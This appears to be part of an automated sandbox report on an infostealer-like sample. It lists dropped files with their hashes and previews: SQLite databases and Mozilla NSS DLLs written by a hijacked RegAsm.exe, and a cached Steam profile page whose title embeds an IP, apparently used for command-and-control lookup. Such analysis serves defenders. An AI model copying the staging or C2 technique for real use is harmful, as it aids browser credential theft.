Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJKKKFC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGIDGCBAFIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse Filename: j36lCJ7IcT.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: YY8EqpwVDY.exe, Detection: malicious, Browse Filename: bhhPvHM59A.exe, Detection: malicious, Browse Filename: tt1pR7pJbF.exe, Detection: malicious, Browse Filename: IvxnEUAtC3.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MBSetup.exe, Detection: malicious, Browse Filename: MBSetup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QEO2mJ8xHx.exe, Detection: malicious, Browse Filename: j36lCJ7IcT.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: YY8EqpwVDY.exe, Detection: malicious, Browse Filename: bhhPvHM59A.exe, Detection: malicious, Browse Filename: tt1pR7pJbF.exe, Detection: malicious, Browse Filename: IvxnEUAtC3.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIIJJJKEGI\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_58cbbdabe4c24a5e12620d3d2ad4d716cc762a1_df623e3f_8c5bfa1b-689e-47c3-9a33-2235ea871181\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.71692688198349
Encrypted:	false
SSDEEP:	192:JK+CaUYv2PlmO0ooyh03jCqzuiFMZ24IO8ThB:gOT2Nm1ooyGjnzuiFMY4IO8L
MD5:	3D4882FCEC8DC87D6E4B833C19647C07
SHA1:	79F557C4F0E1605AFB972265D455A323C294710B
SHA-256:	A3FAC9FC206CB93CAF60CA7AFDA20BFCD3790BACCB463F53038688F04C1D94D3
SHA-512:	EF67AD4334C9D3C388E0C6F9305EA7FB38E3E249BB3DDF8AA569CED44C111035036A1BCFED59516175F4E84DA23E6D43268F55C414C5FC22DF830B5035DC1ED0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.7.5.0.3.4.0.4.6.2.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.7.5.0.3.4.4.6.8.1.7.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.b.f.a.1.b.-.6.8.9.e.-.4.7.c.3.-.9.a.3.3.-.2.2.3.5.e.a.8.7.1.1.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.7.c.2.a.d.9.-.0.c.2.4.-.4.e.7.d.-.9.4.b.7.-.6.8.1.8.e.6.1.c.6.0.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.c.-.0.0.0.1.-.0.0.1.5.-.7.8.8.6.-.7.8.9.2.b.6.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.b.0.9.c.d.c.2.8.0.6.0.1.e.6.3.5.7.9.a.e.2.c.b.6.4.d.8.6.3.a.0.4.1.9.d.9.7.1.c.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEA8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Apr 23 19:43:54 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35314
Entropy (8bit):	1.8941425937539742
Encrypted:	false
SSDEEP:	96:5W8cE3t0fwwLjAhFCmv6aquGati7fK70v6B/zV6ep4xpERbiN9QIrKVkjS68LWxt:vi72DqotOSB/zBIgQjobRXn1tb
MD5:	04AFA747AA0F673254EC674C7D0FF408
SHA1:	F92B6636AFF0C844924F8234E31ECC968F6E9648
SHA-256:	F714327B64D86A829565E85548FB6A7FBA0A895E475C85517176B01456A35127
SHA-512:	C528881271C6B79624A936FDD9A0525B9A1BB89D3074408C759A7F1B68D35B86B2F0871B08722789AE06479783E4A7BDF4DD727BE3EEDCEC9148D9604423924A
Malicious:	false
Preview:	MDMP..a..... .......z.(f....................................................T.......8...........T...............2{..........8...........$...............................................................................eJ..............GenuineIntel............T...........y.(f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF55.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.6956879668484777
Encrypted:	false
SSDEEP:	192:R6l7wVeJtCv6Km6Y2DpSU9SR5gmfBDJl4nnpr/89bFFsfV6Xm:R6lXJA6Km6YUSU9SR5gmfVJl4nqFefVz
MD5:	1E40AE4AF5560E98550E66144A2EB91F
SHA1:	D1460D5329CA1AF47894F13C24489A738F755169
SHA-256:	FC878CF535E1DF763DBB319DDF2C26F7DA0722C8CA64E500CB819ABD943FDB8C
SHA-512:	9A02EADF07B88157405F320BA49E9F104C38B88BC2BF69F26DB64A4F8EB2524A08729466810D9D554922E4C45BD6108B2E9B08D57D519AAF2CD7E66DB790A47F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF94.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4605
Entropy (8bit):	4.483680518661762
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiJg77aI9mGSWpW8VYOCYm8M4J1vF9+q83T0xAkUd:uIjfwI7847VhJBI0xAkUd
MD5:	CA4A268F499C0FCB177F623DCED1EB38
SHA1:	08F07C320ACA6E0B300307D9DB067D889BC3F442
SHA-256:	D0413C02D0F1309F5BC478B992ABB9ECE3999C97EC892869CAE97D7212B77738
SHA-512:	802E633431836610C6A2FAE675C53A6E13EDC8BB7F1B9A6C58069D3DEDAE8BFE05354C76C72CC9B7C8B187286AE9A2A4AB36D7EC0B075105CD199C426F365AE4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292966" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqln[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199677575543[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	33800
Entropy (8bit):	5.4355085048118585
Encrypted:	false
SSDEEP:	768:kqdpqm+0Iz3YAA9CWGjSvtfcDAgZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKM:3d8m+0Iz3YAA9CWGjqFgZ4VWBCW3KI8s
MD5:	6C66541D68DED8BDE1AF3A21D9314EF3
SHA1:	879ED8B8206C53BFA2B5814D444BD7B820F54306
SHA-256:	BF01C6ED6D7947B1AEEAE24021D2C1C86623668CC7BCB9ACD31AFD1FB4EBD9F0
SHA-512:	FB4F6D9B9C44F3B19FC82D2C0EAE5F5AA1C434D1C90EA56CA8CF279703BA097EA8885314C2ED561A4A3CC60C6C807266CBDEC9FFD3041D38FCCA84F351D1C41C
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: nve7n2 https://95.217.244.99\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll

Download File

